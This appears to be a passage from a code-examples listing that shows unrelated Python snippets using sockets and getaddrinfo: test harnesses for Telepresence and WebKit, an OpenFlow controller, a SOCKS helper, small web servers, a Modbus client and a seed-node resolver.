        # retrieving it from the network, and get it from there, instead.
        url_key = URL_KEY_RE.sub('_', url)
        cached_message = self.urlCorpus.get(url_key)

        if cached_message is None:
            # We're going to ignore everything that isn't text/html,
            # so we might as well not bother retrieving anything with
            # these extensions.
            parts = url.split('.')
            if parts[-1] in ('jpg', 'gif', 'png', 'css', 'js'):
                self.bad_urls["url:non_html"] += (url, )
                return ["url:non_html"]

            # Waiting for the default timeout period slows everything
            # down far too much, so try and reduce it for just this
            # call (this will only work with Python 2.3 and above).
            try:
                timeout = socket.getdefaulttimeout()
                socket.setdefaulttimeout(5)
            except AttributeError:
                # Probably Python 2.2.
                pass
            try:
                if options["globals", "verbose"]:
                    print >> sys.stderr, "Slurping", url
                f = urllib2.urlopen("%s://%s" % (proto, url))
            except (urllib2.URLError, socket.error), details:
                mo = HTTP_ERROR_RE.match(str(details))
                if mo:
                    self.http_error_urls[url] = "url:http_" + mo.group(1)
                    return ["url:http_" + mo.group(1)]
                self.bad_urls["url:unknown_error"] += (url, )
                return ["url:unknown_error"]
            # Restore the timeout
            try:
                socket.setdefaulttimeout(timeout)
            except AttributeError:
                # Probably Python 2.2.
                pass

            try:
                # Anything that isn't text/html is ignored
                content_type = f.info().get('content-type')
                if content_type is None or \
                   not content_type.startswith("text/html"):
                    self.bad_urls["url:non_html"] += (url, )
                    return ["url:non_html"]

                page = f.read()
                headers = str(f.info())
                f.close()
            except socket.error:
                # This is probably a temporary error, like a timeout.
                # For now, just bail out.
                return []

            fake_message_string = headers + "\r\n" + page

            # Retrieving the same messages over and over again will tire
            # us out, so we store them in our own wee cache.
            message = self.urlCorpus.makeMessage(url_key, fake_message_string)
            self.urlCorpus.addMessage(message)
Example #32
class Probe(object):
    CLIENT_ENV_VAR = "SHOULD_NOT_BE_SET"

    DESIRED_ENVIRONMENT = {
        "MYENV":
        "hello",
        "EXAMPLE_ENVFROM":
        "foobar",
        "EX_MULTI_LINE": ("first line = (no newline before, newline after)\n"
                          "second line = (newline before and after)\n"),
        "EX_JSON_BLOB_FROM_597":
        _json_blob,
    }

    # A resource available from a server running on the Telepresence host
    # which the tests can use to verify correct routing-to-host behavior from
    # the Telepresence execution context.
    LOOPBACK_URL_TEMPLATE = "http://localhost:{}/test_endtoend.py"

    # Commands which indirectly interact with Telepresence in some way and
    # which may not be supported (and which we care about failing in a
    # nice way).
    QUESTIONABLE_COMMANDS = [
        "ping",
        "traceroute",
        "nslookup",
        "host",
        "dig",
    ]

    # Paths relative to $TELEPRESENCE_ROOT in the Telepresence execution
    # context which the probe will read and return to us.
    INTERESTING_PATHS = [
        "podinfo/labels",
        "var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
    ]

    # Get some httpbin.org addresses.  We avoid the real domain name in the
    # related tests due to
    # <https://github.com/datawire/telepresence/issues/379>.
    _httpbin = iter(getaddrinfo(
        "httpbin.org",
        80,
        AF_INET,
        SOCK_STREAM,
    ))

    #
    # Also notice that each ALSO_PROXY_... uses non-overlapping addresses
    # because we run Telepresence once with _all_ of these as ``--also-proxy``
    # arguments.  We want to make sure each case works so we don't want
    # overlapping addresses where an argument of form might work and cause it
    # to appear as though the other cases are also working.  Instead, with a
    # different address each time, each form must be working.
    _an_ip = next(_httpbin)[4][0]
    ALSO_PROXY_HOSTNAME = AlsoProxy(
        # This is just any domain name that resolves to _one_ IP address that
        # will serve up httpbin.org.  See #379.
        gethostbyaddr(_an_ip)[0],
        _an_ip,
    )

    # This time we're exercising Telepresence support for specifying an IP
    # address literal to ``--also-proxy``.
    _an_ip = next(_httpbin)[4][0]
    ALSO_PROXY_IP = AlsoProxy(
        _an_ip,
        _an_ip,
    )

    # This time exercising support for specifying an IP network to
    # ``--also-proxy``.
    _an_ip = next(_httpbin)[4][0]
    ALSO_PROXY_CIDR = AlsoProxy(
        "{}/32".format(_an_ip),
        _an_ip,
    )

    HTTP_SERVER_SAME_PORT = HTTPServer(
        random_port(),
        None,
        random_name("same"),
    )
    print("HTTP Server same-port: {}".format(
        HTTP_SERVER_SAME_PORT.remote_port, ))
    HTTP_SERVER_DIFFERENT_PORT = HTTPServer(
        12360,
        random_port(),
        random_name("diff"),
    )
    print("HTTP Server diff-port: {}".format(
        HTTP_SERVER_DIFFERENT_PORT.remote_port, ))
    HTTP_SERVER_LOW_PORT = HTTPServer(
        12350,
        # This needs to be allocated from the privileged range.  Try to avoid
        # values that are obviously going to fail.  We only allocate one
        # low-value port number so we don't need special steps to avoid
        # reusing one.
        retry({22, 80, 111, 443}.__contains__, partial(randrange, 1, 1024)),
        random_name("low"),
    )

    _result = None

    def __init__(self, request, method, operation):
        self._request = request
        self.method = method
        self.operation = operation
        self._cleanup = []

    def __str__(self):
        return "Probe[{}, {}]".format(
            self.method.name,
            self.operation.name,
        )

    def result(self):
        if self._result is None:
            print("Launching {}".format(self))

            local_port = find_free_port()
            self.loopback_url = self.LOOPBACK_URL_TEMPLATE.format(local_port, )
            # This is a local web server that the Telepresence probe can try to
            # interact with to verify network routing to the host.
            p = Popen(
                # TODO Just cross our fingers and hope this port is available...
                [executable, "-m", "http.server",
                 str(local_port)],
                cwd=str(DIRECTORY),
            )
            self._cleanup.append(lambda: _cleanup_process(p))

            also_proxy = [
                self.ALSO_PROXY_HOSTNAME.argument,
                self.ALSO_PROXY_IP.argument,
                self.ALSO_PROXY_CIDR.argument,
            ]
            http_servers = [
                self.HTTP_SERVER_SAME_PORT,
                self.HTTP_SERVER_DIFFERENT_PORT,
                self.HTTP_SERVER_LOW_PORT,
            ]
            self._result = "FAILED"
            self._result = run_telepresence_probe(
                self._request, self.method, self.operation,
                self.DESIRED_ENVIRONMENT, {self.CLIENT_ENV_VAR: "FOO"},
                [self.loopback_url], self.QUESTIONABLE_COMMANDS,
                self.INTERESTING_PATHS, also_proxy, http_servers)
            self._cleanup.append(self.ensure_dead)
            self._cleanup.append(self.cleanup_resources)
        assert self._result != "FAILED"
        return self._result

    def cleanup(self):
        print("Cleaning up {}".format(self))
        for cleanup in self._cleanup:
            cleanup()

    def ensure_dead(self):
        """
        Make sure the Telepresence process launched by this Probe is no longer
        running.

        :raise Exception: If no Telepresence process was ever launched by this
            Probe in the first place.
        """
        if self._result is None:
            raise Exception("Probe never launched")
        if self._result == "FAILED":
            raise Exception("Probe has failed")

        _cleanup_process(self._result.telepresence)

    def cleanup_resources(self):
        """
        Delete Kubernetes resources related to this Probe.

        :raise Exception: If no Telepresence process was ever launched by this
            Probe in the first place.
        """
        if self._result is None:
            raise Exception("Probe never launched")

        self.operation.cleanup_deployment(self._result.deployment_ident)
        self.operation.cleanup_service(self._result.deployment_ident)
        cleanup_namespace(self._result.deployment_ident.namespace)
Example #33
    def __init__(self, port_obj, output_dir, additional_dirs,
                 number_of_servers):
        super(ApacheHTTP, self).__init__(port_obj, output_dir)
        # We use the name "httpd" instead of "apache" to make our paths (e.g. the pid file: /tmp/WebKit/httpd.pid)
        # match old-run-webkit-tests: https://bugs.webkit.org/show_bug.cgi?id=63956
        self._name = 'httpd'
        self._log_prefixes = ('access_log', 'error_log')
        self._mappings = [{
            'port': 8000
        }, {
            'port': 8080
        }, {
            'port': 8443,
            'sslcert': True
        }]
        self._number_of_servers = number_of_servers

        self._pid_file = self._filesystem.join(self._runtime_path,
                                               '%s.pid' % self._name)

        executable = self._port_obj.path_to_apache()
        server_root = self._filesystem.dirname(
            self._filesystem.dirname(executable))

        test_dir = self._port_obj.layout_tests_dir()
        document_root = self._filesystem.join(test_dir, "http", "tests")
        js_test_resources_dir = self._filesystem.join(test_dir, "resources")
        forms_test_resources_dir = self._filesystem.join(
            test_dir, "fast", "forms", "resources")
        media_resources_dir = self._filesystem.join(test_dir, "media")
        mime_types_path = self._filesystem.join(test_dir, "http", "conf",
                                                "mime.types")
        cert_file = self._filesystem.join(test_dir, "http", "conf",
                                          "webkit-httpd.pem")
        inspector_sources_dir = self._port_obj.inspector_build_directory()

        self._access_log_path = self._filesystem.join(output_dir,
                                                      "access_log.txt")
        self._error_log_path = self._filesystem.join(output_dir,
                                                     "error_log.txt")

        self._is_win = self._port_obj.host.platform.is_win()

        start_cmd = [
            executable,
            '-f',
            '%s' % self._port_obj.path_to_apache_config_file(),
            '-C',
            'ServerRoot "%s"' % server_root,
            '-C',
            'DocumentRoot "%s"' % document_root,
            '-c',
            'Alias /js-test-resources "%s"' % js_test_resources_dir,
            '-c',
            'Alias /forms-test-resources "%s"' % forms_test_resources_dir,
            '-c',
            'Alias /media-resources "%s"' % media_resources_dir,
            '-c',
            'TypesConfig "%s"' % mime_types_path,
            '-c',
            'CustomLog "%s" common' % self._access_log_path,
            '-c',
            'ErrorLog "%s"' % self._error_log_path,
            '-c',
            'PidFile %s' % self._pid_file,
            '-c',
            'SSLCertificateFile "%s"' % cert_file,
            '-c',
            'Alias /inspector-sources "%s"' % inspector_sources_dir,
        ]

        if self._is_win:
            start_cmd += [
                '-c',
                "ThreadsPerChild %d" % (self._number_of_servers * 8)
            ]
        else:
            start_cmd += [
                '-c',
                "StartServers %d" % self._number_of_servers, '-c',
                "MinSpareServers %d" % self._number_of_servers, '-c',
                "MaxSpareServers %d" % self._number_of_servers, '-C',
                'User "%s"' %
                os.environ.get('USERNAME', os.environ.get('USER', '')), '-k',
                'start'
            ]

        enable_ipv6 = self._port_obj.http_server_supports_ipv6()
        # Perform part of the checks Apache's APR does when trying to listen to
        # a specific host/port. This allows us to avoid trying to listen to
        # IPV6 addresses when it fails on Apache. APR itself tries to call
        # getaddrinfo() again without AI_ADDRCONFIG if the first call fails
        # with EBADFLAGS, but that is not how it normally fails in our use
        # cases, so ignore that for now.
        # See https://bugs.webkit.org/show_bug.cgi?id=98602#c7
        try:
            socket.getaddrinfo('::1', 0, 0, 0, 0, socket.AI_ADDRCONFIG)
        except:
            enable_ipv6 = False

        for mapping in self._mappings:
            port = mapping['port']

            start_cmd += ['-C', "Listen 127.0.0.1:%d" % port]

            # We listen to both IPv4 and IPv6 loop-back addresses, but ignore
            # requests to 8000 from random users on network.
            # See https://bugs.webkit.org/show_bug.cgi?id=37104
            if enable_ipv6:
                start_cmd += ['-C', "Listen [::1]:%d" % port]

        if additional_dirs:
            self._start_cmd = start_cmd
            for alias, path in additional_dirs.iteritems():
                start_cmd += [
                    '-c',
                    'Alias %s "%s"' % (alias, path),
                    # Disable CGI handler for additional dirs.
                    '-c',
                    '<Location %s>' % alias,
                    '-c',
                    'RemoveHandler .cgi .pl',
                    '-c',
                    '</Location>'
                ]

        self._start_cmd = start_cmd
Example #34
    def __init__(self,
                 switch=None,
                 host='127.0.0.1',
                 port=6653,
                 max_pkts=1024,
                 force=False):
        Thread.__init__(self)
        # Socket related
        self.rcv_size = RCV_SIZE_DEFAULT
        self.listen_socket = None
        self.switch_socket = None
        self.switch_addr = None
        self.connect_cv = Condition()
        self.message_cv = Condition()
        self.tx_lock = Lock()

        # Used to wake up the event loop from another thread
        self.waker = ofutils.EventDescriptor()

        # Counters
        self.socket_errors = 0
        self.parse_errors = 0
        self.packets_total = 0
        self.packets_expired = 0
        self.packets_handled = 0
        self.poll_discards = 0

        # State
        self.sync = Lock()
        self.handlers = {}
        self.keep_alive = False
        self.active = True
        self.initial_hello = True

        # OpenFlow message/packet queue
        # Protected by the packets_cv lock / condition variable
        self.packets = []
        self.packets_cv = Condition()
        self.packet_in_count = 0

        # Settings
        self.max_pkts = max_pkts
        self.switch = switch
        self.passive = not self.switch
        self.force = force
        self.host = host
        self.port = port
        self.dbg_state = "init"
        self.logger = logging.getLogger("controller")
        self.filter_packet_in = False  # Drop "excessive" packet ins
        self.pkt_in_run = 0  # Count on run of packet ins
        self.pkt_in_filter_limit = 50  # Count on run of packet ins
        self.pkt_in_dropped = 0  # Total dropped packet ins
        self.transact_to = 15  # Transact timeout default value; add to config

        # Transaction and message type waiting variables
        #   xid_cv: Condition variable (semaphore) for packet waiters
        #   xid: Transaction ID being waited on
        #   xid_response: Transaction response message
        self.xid_cv = Condition()
        self.xid = None
        self.xid_response = None

        self.buffered_input = ""

        # Create listen socket
        if self.passive:
            self.logger.info("Create/listen at " + self.host + ":" +
                             str(self.port))
            ai = socket.getaddrinfo(self.host, self.port, socket.AF_UNSPEC,
                                    socket.SOCK_STREAM, 0, socket.AI_PASSIVE)
            # Use first returned addrinfo
            (family, socktype, proto, name, sockaddr) = ai[0]
            self.listen_socket = socket.socket(family, socktype)
            self.listen_socket.setsockopt(socket.SOL_SOCKET,
                                          socket.SO_REUSEADDR, 1)
            self.listen_socket.bind(sockaddr)
            self.listen_socket.listen(LISTEN_QUEUE_SIZE)
Example #35
def create_connection(dest_pair,
                      timeout=None,
                      source_address=None,
                      proxy_type=None,
                      proxy_addr=None,
                      proxy_port=None,
                      proxy_rdns=True,
                      proxy_username=None,
                      proxy_password=None,
                      socket_options=None):
    """create_connection(dest_pair, *[, timeout], **proxy_args) -> socket object

    Like socket.create_connection(), but connects to proxy
    before returning the socket object.

    dest_pair - 2-tuple of (IP/hostname, port).
    **proxy_args - Same args passed to socksocket.set_proxy() if present.
    timeout - Optional socket timeout value, in seconds.
    source_address - tuple (host, port) for the socket to bind to as its source
    address before connecting (only for compatibility)
    """
    # Remove IPv6 brackets on the remote address and proxy address.
    remote_host, remote_port = dest_pair
    if remote_host.startswith("["):
        remote_host = remote_host.strip("[]")
    if proxy_addr and proxy_addr.startswith("["):
        proxy_addr = proxy_addr.strip("[]")

    err = None

    # Allow the SOCKS proxy to be on IPv4 or IPv6 addresses.
    for r in socket.getaddrinfo(proxy_addr, proxy_port, 0, socket.SOCK_STREAM):
        family, socket_type, proto, canonname, sa = r
        sock = None
        try:
            sock = socksocket(family, socket_type, proto)

            if socket_options:
                for opt in socket_options:
                    sock.setsockopt(*opt)

            if isinstance(timeout, (int, float)):
                sock.settimeout(timeout)

            if proxy_type:
                sock.set_proxy(proxy_type, proxy_addr, proxy_port, proxy_rdns,
                               proxy_username, proxy_password)
            if source_address:
                sock.bind(source_address)

            sock.connect((remote_host, remote_port))
            return sock

        except (socket.error, ProxyConnectionError) as e:
            err = e
            if sock:
                sock.close()
                sock = None

    if err:
        raise err

    raise socket.error("gai returned empty list.")
Example #36
def main(boardType, tempoalboot):
    global WatchDog
    _thread.start_new_thread(WatchDogFun, ())

    print(
        "\n=====================================\nWelcome to Wheather App on "
        + str(boardType) + ".....\n=====================================\n")
    counterK = 0
    ResetCsvFile = False
    wait = 0  # for TIME WAIT mgmt
    try:
        addrListen = socket.getaddrinfo('0.0.0.0', 80)[0][-1]
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(mainAppConstants.SOCKETTIMEOUT)
        s.bind(addrListen)
        s.listen(1)
        print("first allocation", s.fileno())
    except:
        wait = 1
        s.close()
        print('error in first socket allocation')

    while True:
        WatchDog = (WatchDog + 1) % 20
        wait = 0
        try:
            if s.fileno() == -1:
                print('file no = -1')
                addrListen = socket.getaddrinfo('0.0.0.0', 80)[0][-1]
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.settimeout(mainAppConstants.SOCKETTIMEOUT)
                s.bind(addrListen)
                s.listen(1)
                print("loop allocation", s.fileno())
            else:
                #print('else file no = ',s.fileno())
                pass
        except:
            print("EXCEPTION WHILE ALLOCATING SOCKET")
            wait = 1
            s.close()
            #return -1,ResetCsvFile

        #After MAX_SAMPLES_STORED samples
        if counterK == 0:
            #resets the content of html page
            fout = open('main_out.txt', 'w')
            fout.write('')
            fout.close()

            #starts new section in csv file
            fin = open('headers_download_file.txt', 'r')
            fout = open('dati.csv', 'a')
            for x in fin:
                fout.write(x)
            fout.close()
            fin.close()

        if ResetCsvFile:
            fout = open('main_out.txt', 'w')
            fout.write('')
            fout.close()

            fin = open('headers_download_file.txt', 'r')
            fout = open('dati.csv', 'w')
            for x in fin:
                fout.write(x)
            fout.close()
            fin.close()
            ResetCsvFile = False
        #Getting Samples
        stringaHtmlDati, dati = updateWheateherValues(boardType, counterK,
                                                      tempoalboot)
        #Updating html main page
        fout = open('main_out.txt', 'a')
        fout.write(stringaHtmlDati)
        fout.close()
        #Updating download file
        fout = open("dati.csv", "a")
        fout.write(dati)
        fout.close()

        counterK = (counterK + 1) % mainAppConstants.MAX_SAMPLES_STORED
        #print("counterK",counterK)
        '''
        #printing content of file dati.csv for debug purpose only
        f=open("dati.csv","r")
        with f:
            print(f.read())
        f.close()
        '''

        #verifies if in the meanwhile WiFiSTA came up
        activateNet.do_setupWiFiSTA()

        retCode, ResetCsvFile = startWebServer(boardType, s, addrListen)
        if wait == -1:
            print('\nWaiting for TIME SLEEP.....\n')
            utime.sleep(145)
Example #37
0
        def do_POST(self):
            form = cgi.FieldStorage(fp=self.rfile,
                                    headers=self.headers,
                                    environ={'REQUEST_METHOD': 'POST'})
            client_request = self.path[1:]

            if client_request == 'server_info':
                server = None
                max_tasks = 0
                for item in form.list:
                    if item.name == 'location':
                        m = re.match(HTTPServer.loc_re, item.value)
                        if m:
                            node = self._ctx._nodes.get(m.group(1))
                            if node:
                                server = node.servers.get(item.value)
                    elif item.name == 'limit':
                        try:
                            max_tasks = int(item.value)
                        except Exception:
                            pass
                if server:
                    if 0 < max_tasks < len(server.tasks):
                        rtasks = []
                        for i, rtask in enumerate(
                                dict_iter(server.tasks, 'values')):
                            if i >= max_tasks:
                                break
                            rtasks.append(rtask)
                    else:
                        rtasks = server.tasks.values()
                    show_args = self._ctx._show_args
                    rtasks = [{
                        'task': str(rtask.task),
                        'name': rtask.task.name,
                        'args': ', '.join(str(arg) for arg in rtask.args)
                                if show_args else '',
                        'kwargs': ', '.join('%s=%s' % (key, val)
                                            for key, val in rtask.kwargs.items())
                                  if show_args else '',
                        'start_time': rtask.start_time
                    } for rtask in rtasks]
                    info = {
                        'location': str(server.location),
                        'status': server.status,
                        'tasks_submitted': server.tasks_submitted,
                        'tasks_done': server.tasks_done,
                        'tasks': rtasks,
                        'update_time': node.update_time
                    }
                else:
                    info = {}
                self.send_response(200)
                self.send_header('Content-Type',
                                 'application/json; charset=utf-8')
                self.end_headers()
                self.wfile.write(json.dumps(info).encode())
                return

            elif client_request == 'node_info':
                addr = None
                for item in form.list:
                    if item.name == 'host':
                        if re.match(HTTPServer.ip_re, item.value):
                            addr = item.value
                        else:
                            try:
                                info = socket.getaddrinfo(item.value, None)[0]
                                ip_addr = info[4][0]
                                if info[0] == socket.AF_INET6:
                                    ip_addr = re.sub(r'^0+', '', ip_addr)
                                    ip_addr = re.sub(r':0+', ':', ip_addr)
                                    ip_addr = re.sub(r'::+', '::', ip_addr)
                                addr = ip_addr
                            except Exception:
                                addr = item.value
                        break
                node = self._ctx._nodes.get(addr)
                if node:
                    info = {
                        'addr': node.addr,
                        'name': node.name,
                        'status': node.status,
                        'update_time': node.update_time,
                        'avail_info': node.avail_info.__dict__,
                        'tasks_submitted': node.tasks_submitted,
                        'tasks_done': node.tasks_done,
                        'servers': [{
                            'location': str(server.location),
                            'tasks_submitted': server.tasks_submitted,
                            'tasks_done': server.tasks_done,
                            'tasks_running': len(server.tasks),
                            'update_time': node.update_time
                        } for server in node.servers.values()]
                    }
                else:
                    info = {}
                self.send_response(200)
                self.send_header('Content-Type',
                                 'application/json; charset=utf-8')
                self.end_headers()
                self.wfile.write(json.dumps(info).encode())
                return

            elif client_request == 'terminate_tasks':
                tasks = []
                for item in form.list:
                    if item.name == 'task':
                        try:
                            tasks.append(item.value)
                        except ValueError:
                            pycos.logger.debug(
                                'Terminate: task "%s" is invalid', item.value)

                terminated = []
                self._ctx._lock.acquire()
                for task in tasks:
                    s = task.split('@')
                    if len(s) != 2:
                        continue
                    location = s[1]
                    s = location.split(':')
                    if len(s) != 2:
                        continue
                    node = self._ctx._nodes.get(s[0])
                    if not node:
                        continue
                    server = node.servers.get(location)
                    if not server:
                        continue
                    rtask = server.tasks.get(task)
                    if rtask and rtask.task.terminate() == 0:
                        terminated.append(task)
                self._ctx._lock.release()
                self.send_response(200)
                self.send_header('Content-Type',
                                 'application/json; charset=utf-8')
                self.end_headers()
                self.wfile.write(json.dumps(terminated).encode())
                return

            elif client_request == 'update':
                for item in form.list:
                    if item.name == 'timeout':
                        try:
                            timeout = int(item.value)
                            if timeout < 1:
                                timeout = 0
                            self._ctx._poll_sec = timeout
                        except Exception:
                            pycos.logger.warning(
                                'HTTP client %s: invalid timeout "%s" ignored',
                                self.client_address[0], item.value)
                    elif item.name == 'show_task_args':
                        if item.value == 'true':
                            self._ctx._show_args = True
                        else:
                            self._ctx._show_args = False

                self.send_response(200)
                self.send_header('Content-Type', 'text/html')
                self.end_headers()
                return

            elif (client_request == 'suspend_node'
                  or client_request == 'resume_node'):
                method = getattr(self._ctx.computation, client_request)
                if not method:
                    return
                nodes = []
                for item in form.list:
                    if item.name == 'nodes':
                        nodes = json.loads(item.value)
                        break
                for node in nodes:
                    method(node)
                return

            elif (client_request == 'suspend_server'
                  or client_request == 'resume_server'):
                method = getattr(self._ctx.computation, client_request)
                if not method:
                    return
                servers = []
                for item in form.list:
                    if item.name == 'servers':
                        servers = json.loads(item.value)
                        break
                for loc in servers:
                    loc = loc.split(':')
                    if len(loc) != 2:
                        continue
                    try:
                        loc = pycos.Location(loc[0], loc[1])
                    except Exception:
                        continue
                    method(loc)
                return

            else:
                pycos.logger.debug('Bad POST request from %s: %s',
                                   self.client_address[0], client_request)
                self.send_error(400)
                return
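A hedged sketch of how a client could exercise the 'node_info' endpoint handled above; the base URL, port, and helper name are assumptions, not taken from the example:

import json
import urllib.parse
import urllib.request

def query_node_info(host, base_url='http://127.0.0.1:8181'):  # port is a guess
    data = urllib.parse.urlencode({'host': host}).encode()
    with urllib.request.urlopen(base_url + '/node_info', data=data) as resp:
        return json.loads(resp.read().decode())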
Example #38
0
 def __init__(self, slave_ip, slave_port=502, timeout=5):
     self._sock = socket.socket()
     # set the timeout before connecting so the connect itself cannot hang
     self._sock.settimeout(timeout)
     # getaddrinfo() returns (family, type, proto, canonname, sockaddr); [-1] is the sockaddr
     self._sock.connect(socket.getaddrinfo(slave_ip, slave_port)[0][-1])
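The same connect-with-timeout can also be expressed with socket.create_connection(), which performs the getaddrinfo() lookup and tries each result internally; a minimal sketch, keeping the Modbus default port from the example (the helper name is hypothetical):

import socket

def open_modbus_socket(slave_ip, slave_port=502, timeout=5):
    # create_connection() resolves the host, walks the results and applies
    # the timeout to the connect attempt itself
    return socket.create_connection((slave_ip, slave_port), timeout=timeout)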
Example #39
0
import socket

seeders = [
    'bwkseed.mempool.pw', 'bwkseed1.fantasygoldcrypto.com',
    'bwkseed2.fantasygoldcrypto.com', 'bwkseed3.fantasygoldcrypto.com',
    'bwkseed4.fantasygoldcrypto.com', 'bwkseed5.fantasygoldcrypto.com',
    'bwkseed1.fantasygoldcrypto.site', 'bwkseed2.fantasygoldcrypto.site',
    'bwkseed3.fantasygoldcrypto.site', 'bwkseed4.fantasygoldcrypto.site',
    'bwkseed5.fantasygoldcrypto.site'
]

for seeder in seeders:
    try:
        ais = socket.getaddrinfo(seeder, 0)
    except socket.gaierror:
        ais = []

    # Prevent duplicates, need to update to check
    # for ports, can have multiple nodes on 1 ip.
    addrs = []
    for a in ais:
        addr = a[4][0]
        if addrs.count(addr) == 0:
            addrs.append(addr)

    print(seeder + ' = ' + str(len(addrs)))
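As the comment above notes, the duplicate check ignores ports; a small hedged sketch that keys the check on the full (address, port) pair instead (the helper name resolve_unique is hypothetical):

import socket

def resolve_unique(seeder, port=0):
    try:
        ais = socket.getaddrinfo(seeder, port)
    except socket.gaierror:
        return []
    seen = set()
    unique = []
    for _family, _type, _proto, _canon, sockaddr in ais:
        # keep several nodes on one IP apart by including the port
        key = (sockaddr[0], sockaddr[1])
        if key not in seen:
            seen.add(key)
            unique.append(key)
    return unique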
Example #40
0
def start_httpd(address=None, port=None, join=False, pem=None):
    """
    Starts HTTP server
    """

    class ThreadingServer(_socketserver.ThreadingMixIn, _BaseHTTPServer.HTTPServer):
        def server_bind(self):
            self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            _BaseHTTPServer.HTTPServer.server_bind(self)

        def finish_request(self, *args, **kwargs):
            try:
                _BaseHTTPServer.HTTPServer.finish_request(self, *args, **kwargs)
            except:
                if config.SHOW_DEBUG:
                    traceback.print_exc()

    class SSLThreadingServer(ThreadingServer):
        def __init__(self, server_address, pem, HandlerClass):
            import OpenSSL  # python-openssl

            ThreadingServer.__init__(self, server_address, HandlerClass)
            ctx = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_2_METHOD)
            ctx.use_privatekey_file(pem)
            ctx.use_certificate_file(pem)
            self.socket = OpenSSL.SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
            self.server_bind()
            self.server_activate()

        def shutdown_request(self, request):
            try:
                request.shutdown()
            except:
                pass

    class ReqHandler(_BaseHTTPServer.BaseHTTPRequestHandler):
        def do_GET(self):
            path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "")
            params = {}
            content = None
            skip = False

            if hasattr(self, "data"):
                params.update(_urllib.parse.parse_qs(self.data))

            if query:
                params.update(_urllib.parse.parse_qs(query))

            for key in params:
                if params[key]:
                    params[key] = params[key][-1]

            if path == '/':
                path = "index.html"

            path = path.strip('/')
            extension = os.path.splitext(path)[-1].lower()

            if hasattr(self, "_%s" % path):
                content = getattr(self, "_%s" % path)(params)

            else:
                path = path.replace('/', os.path.sep)
                path = os.path.abspath(os.path.join(HTML_DIR, path)).strip()

                if not os.path.isfile(path) and os.path.isfile("%s.html" % path):
                    path = "%s.html" % path

                if any((config.IP_ALIASES,)) and self.path.split('?')[0] == "/js/main.js":
                    content = open(path, "rb").read()
                    # build the replacement as text, then substitute on the bytes content
                    _replacement = "var IP_ALIASES = {%s};" % ", ".join('"%s": "%s"' % (_.split(':', 1)[0].strip(), _.split(':', 1)[-1].strip()) for _ in config.IP_ALIASES)
                    content = re.sub(rb"\bvar IP_ALIASES =.+", _replacement.encode(UNICODE_ENCODING), content)
                    self.send_response(_http_client.OK)
                elif ".." not in os.path.relpath(path, HTML_DIR) and os.path.isfile(path) and (extension not in DISABLED_CONTENT_EXTENSIONS or os.path.split(path)[-1] in CONTENT_EXTENSIONS_EXCLUSIONS):
                    mtime = time.gmtime(os.path.getmtime(path))
                    if_modified_since = self.headers.get(HTTP_HEADER.IF_MODIFIED_SINCE)

                    if if_modified_since and extension not in (".htm", ".html"):
                        if_modified_since = [_ for _ in if_modified_since.split(';') if _.upper().endswith("GMT")][0]
                        if time.mktime(mtime) <= time.mktime(time.strptime(if_modified_since, HTTP_TIME_FORMAT)):
                            self.send_response(_http_client.NOT_MODIFIED)
                            self.send_header(HTTP_HEADER.CONNECTION, "close")
                            skip = True

                    if not skip:
                        content = open(path, "rb").read()
                        last_modified = time.strftime(HTTP_TIME_FORMAT, mtime)
                        self.send_response(_http_client.OK)
                        self.send_header(HTTP_HEADER.CONNECTION, "close")
                        self.send_header(HTTP_HEADER.CONTENT_TYPE, mimetypes.guess_type(path)[0] or "application/octet-stream")
                        self.send_header(HTTP_HEADER.LAST_MODIFIED, last_modified)

                        # For CSP policy directives see: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/
                        self.send_header(HTTP_HEADER.CONTENT_SECURITY_POLICY, "default-src 'self'; style-src 'self' 'unsafe-inline'; img-src * blob:; " +
                                                                              "script-src 'self' 'unsafe-eval' https://stat.ripe.net; " +
                                                                              "frame-src *; object-src 'none'; block-all-mixed-content;")
                        if extension not in (".htm", ".html"):
                            self.send_header(HTTP_HEADER.EXPIRES, "Sun, 17-Jan-2038 19:14:07 GMT")        # Reference: http://blog.httpwatch.com/2007/12/10/two-simple-rules-for-http-caching/
                            self.send_header(HTTP_HEADER.CACHE_CONTROL, "max-age=3600, must-revalidate")  # Reference: http://stackoverflow.com/a/5084555
                        else:
                            self.send_header(HTTP_HEADER.CACHE_CONTROL, "no-cache")

                else:
                    self.send_response(_http_client.NOT_FOUND)
                    self.send_header(HTTP_HEADER.CONNECTION, "close")
                    content = b'<!DOCTYPE html><html lang="en"><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL %s was not found on this server.</p></body></html>' % self.path.split('?')[0].encode(UNICODE_ENCODING)

            if content is not None:
                if isinstance(content, six.text_type):
                    content = content.encode(UNICODE_ENCODING)

                for match in re.finditer(b"<\\!(\\w+)\\!>", content):
                    name = match.group(1).decode(UNICODE_ENCODING)
                    _ = getattr(self, "_%s" % name.lower(), None)
                    if _:
                        content = self._format(content, **{ name: _() })

                if "gzip" in self.headers.get(HTTP_HEADER.ACCEPT_ENCODING, ""):
                    self.send_header(HTTP_HEADER.CONTENT_ENCODING, "gzip")
                    _ = six.BytesIO()
                    compress = gzip.GzipFile("", "w+b", 9, _)
                    compress._stream = _
                    compress.write(content)
                    compress.flush()
                    compress.close()
                    content = compress._stream.getvalue()

                self.send_header(HTTP_HEADER.CONTENT_LENGTH, str(len(content)))

            self.end_headers()

            try:
                if content:
                    self.wfile.write(content)

                self.wfile.flush()
            except:
                pass

        def do_POST(self):
            length = self.headers.get(HTTP_HEADER.CONTENT_LENGTH)
            data = self.rfile.read(int(length)).decode(UNICODE_ENCODING)
            data = _urllib.parse.unquote_plus(data)
            self.data = data
            self.do_GET()

        def get_session(self):
            retval = None
            cookie = self.headers.get(HTTP_HEADER.COOKIE)

            if cookie:
                match = re.search(r"%s\s*=\s*([^;]+)" % SESSION_COOKIE_NAME, cookie)
                if match:
                    session = match.group(1)
                    if session in SESSIONS:
                        if SESSIONS[session].client_ip != self.client_address[0]:
                            pass
                        elif SESSIONS[session].expiration > time.time():
                            retval = SESSIONS[session]
                        else:
                            del SESSIONS[session]

            if retval is None and not config.USERS:
                retval = AttribDict({"username": "******"})

